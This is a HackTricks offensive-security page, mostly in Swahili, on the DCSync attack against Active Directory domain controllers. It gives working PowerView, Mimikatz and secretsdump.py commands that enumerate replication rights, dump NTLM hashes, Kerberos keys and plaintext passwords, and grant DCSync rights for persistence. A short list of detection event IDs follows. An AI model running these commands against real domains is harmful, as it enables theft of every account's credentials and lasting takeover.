DCSync

Tumia Trickest kujenga na kujiendesha kiotomatiki kazi zinazotumiwa na zana za jamii zilizoendelea zaidi duniani. Pata Ufikiaji Leo:

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

DCSync

Ruhusa ya DCSync inamaanisha kuwa na ruhusa hizi juu ya eneo lenyewe: DS-Replication-Get-Changes, Replicating Directory Changes All na Replicating Directory Changes In Filtered Set.

Maelezo Muhimu Kuhusu DCSync:

Shambulio la DCSync linaiga tabia ya Kidhibiti cha Eneo na kuomba Kidhibiti kingine cha Eneo kuiga taarifa kwa kutumia Huduma ya Kuiga Katalogi ya Protocol ya Mbali (MS-DRSR). Kwa sababu MS-DRSR ni kazi halali na muhimu ya Active Directory, haiwezi kuzuiwa au kuzimwa.
Kwa kawaida tu Wakosoaji wa Eneo, Wakosoaji wa Biashara, Wasimamizi, na Vikundi vya Kidhibiti cha Eneo vina ruhusa zinazohitajika.
Ikiwa nywila za akaunti yoyote zimehifadhiwa kwa usimbaji wa kurudi nyuma, chaguo linapatikana katika Mimikatz kurudisha nywila hiyo kwa maandiko wazi.

Enumeration

Angalia ni nani ana ruhusa hizi kwa kutumia powerview:

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Fanya Kazi Kwenye Kiholela

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Fanya Kazi kwa Mbali

secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking

-just-dc inazalisha faili 3:

moja ikiwa na NTLM hashes
moja ikiwa na funguo za Kerberos
moja ikiwa na nywila za wazi kutoka NTDS kwa akaunti zozote zilizowekwa na reversible encryption iliyowezeshwa. Unaweza kupata watumiaji wenye reversible encryption kwa

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Persistence

Ikiwa wewe ni admin wa domain, unaweza kutoa ruhusa hii kwa mtumiaji yeyote kwa msaada wa powerview:

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose

Kisha, unaweza kuangalia kama mtumiaji alipewa haki 3 kwa kuziangalia katika matokeo ya (unapaswa kuwa na uwezo wa kuona majina ya haki ndani ya uwanja wa "ObjectType"):

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}

Mitigation

Security Event ID 4662 (Sera ya Usalama kwa kitu lazima iwekwe) – Operesheni ilifanywa kwenye kitu
Security Event ID 5136 (Sera ya Usalama kwa kitu lazima iwekwe) – Kitu cha huduma ya directory kilibadilishwa
Security Event ID 4670 (Sera ya Usalama kwa kitu lazima iwekwe) – Ruhusa kwenye kitu zilibadilishwa
AD ACL Scanner - Unda na kulinganisha ripoti za ACLs. https://github.com/canix1/ADACLScanner

References

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

PreviousDCShadow NextDiamond Ticket

Last updated 4 days ago